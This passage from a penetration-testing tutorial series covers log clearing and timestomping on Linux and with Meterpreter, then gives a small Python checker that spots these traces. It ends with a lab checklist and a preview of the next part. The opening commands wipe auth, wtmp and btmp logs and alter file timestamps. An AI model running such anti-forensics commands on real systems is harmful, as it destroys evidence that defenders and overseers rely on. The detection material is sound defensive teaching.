echo "" > /var/log/auth.log
echo "" > /var/log/wtmp
echo "" > /var/log/btmp

# Remove specific log entries
sed -i '/YOUR_IP/d' /var/log/auth.log

# Timestomp (change file timestamps)
touch -r /etc/passwd /path/to/your/file

# Meterpreter
meterpreter > clearev          # Clear Windows event logs
meterpreter > timestomp file -m "01/01/2020 12:00:00"
```

In Real Engagements: Don't Do This

Professional pentesters document their access and report their findings. They don't hide them. Clearing logs destroys evidence that defenders need to understand the attack path. Only practice these techniques in your isolated lab environment.
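Understanding these techniques pays off on the defensive side because each one leaves its own trace. `touch -r` and timestomp can set a file's mtime, but the kernel sets ctime to the current time on every inode change, so a file whose mtime is years older than its ctime is worth a look. `echo "" > /var/log/auth.log` does not even empty the file: it leaves a single newline behind, next to a rotated auth.log.1 that is still full size. The checker below is an added example (my own code, not from the original article) that applies both heuristics to stat snapshots; the file entries are constructed and the thresholds are assumptions.

```python
from datetime import datetime, timedelta

# Constructed stat snapshots: (path, size_bytes, mtime, ctime) with ISO timestamps.
# auth.log is 1 byte: 'echo "" > file' leaves exactly one newline behind.
FILES = [
    ("/var/log/auth.log", 1, "2026-03-09T13:05:00", "2026-03-09T13:05:00"),
    ("/var/log/auth.log.1", 482133, "2026-03-08T23:59:00", "2026-03-09T00:00:05"),
    ("/tmp/.x/run.sh", 1337, "2020-01-01T12:00:00", "2026-03-09T13:04:00"),
    ("/etc/hostname", 14, "2025-11-02T09:00:00", "2025-11-02T09:00:00"),
]

def timestomp_candidates(files, min_gap=timedelta(days=30)):
    """Files whose mtime is far older than their ctime.
    touch/timestomp can rewrite mtime but not ctime, so a large gap is an indicator.
    Package installs that preserve archive mtimes produce the same gap, so treat
    hits as leads to triage (location, owner, content), not as proof."""
    out = []
    for path, _size, mtime, ctime in files:
        m, c = datetime.fromisoformat(mtime), datetime.fromisoformat(ctime)
        if c - m >= min_gap:
            out.append(path)
    return out

def truncated_logs(files, max_bytes=64):
    """Live logs that are (almost) empty while their rotated predecessor is large."""
    sizes = {path: size for path, size, _m, _c in files}
    return [path for path, size, _m, _c in files
            if size <= max_bytes and sizes.get(path + ".1", 0) > max_bytes]

if __name__ == "__main__":
    print("timestomp candidates:", timestomp_candidates(FILES))
    print("truncated logs:", truncated_logs(FILES))
```

Two further points from the block above: `sed -i` rewrites the whole file, so the inode number of auth.log changes and its ctime jumps, which a file-integrity monitor such as AIDE records; and on Windows, clearing the Security log with clearev generates Event ID 1102 ("The audit log was cleared"), which is why log forwarding to a collector the attacker cannot reach is the real mitigation for every line in this section.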


Part 4 Checklist

☐ Lab Setup: Metasploitable 2 running, isolated network configured

☐ Metasploit: Database initialized, basic navigation mastered

☐ First Exploit: vsftpd backdoor exploited, root shell obtained

☐ Multiple Vectors: Exploited FTP, SMB, and cracked SSH credentials

☐ Post-Exploitation: Password hashes dumped, system enumerated

☐ Privilege Escalation: Escalated from user to root without network exploit

☐ Pivoting: Understand autoroute and SOCKS proxy concepts

☐ Documentation: All exploits documented with steps and evidence


What's Next

You've learned to exploit vulnerabilities, escalate privileges, and pivot through networks. You've seen how quickly a single weakness becomes total compromise. You understand what professional penetration testers do.

In Part 5, we bring everything together. You'll conduct a complete security audit from start to finish:

  • Scoping and rules of engagement
  • Full reconnaissance methodology
  • Systematic exploitation
  • Comprehensive post-exploitation
  • Professional reporting
  • Remediation recommendations

Part 5 is the capstone. Everything you've learned across this series comes together into a real-world methodology you can use to assess the security of any network you're authorized to test.

You've learned the techniques. Now you learn the methodology. Part 5 turns skills into a complete penetration testing workflow.

See you in Part 5.

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.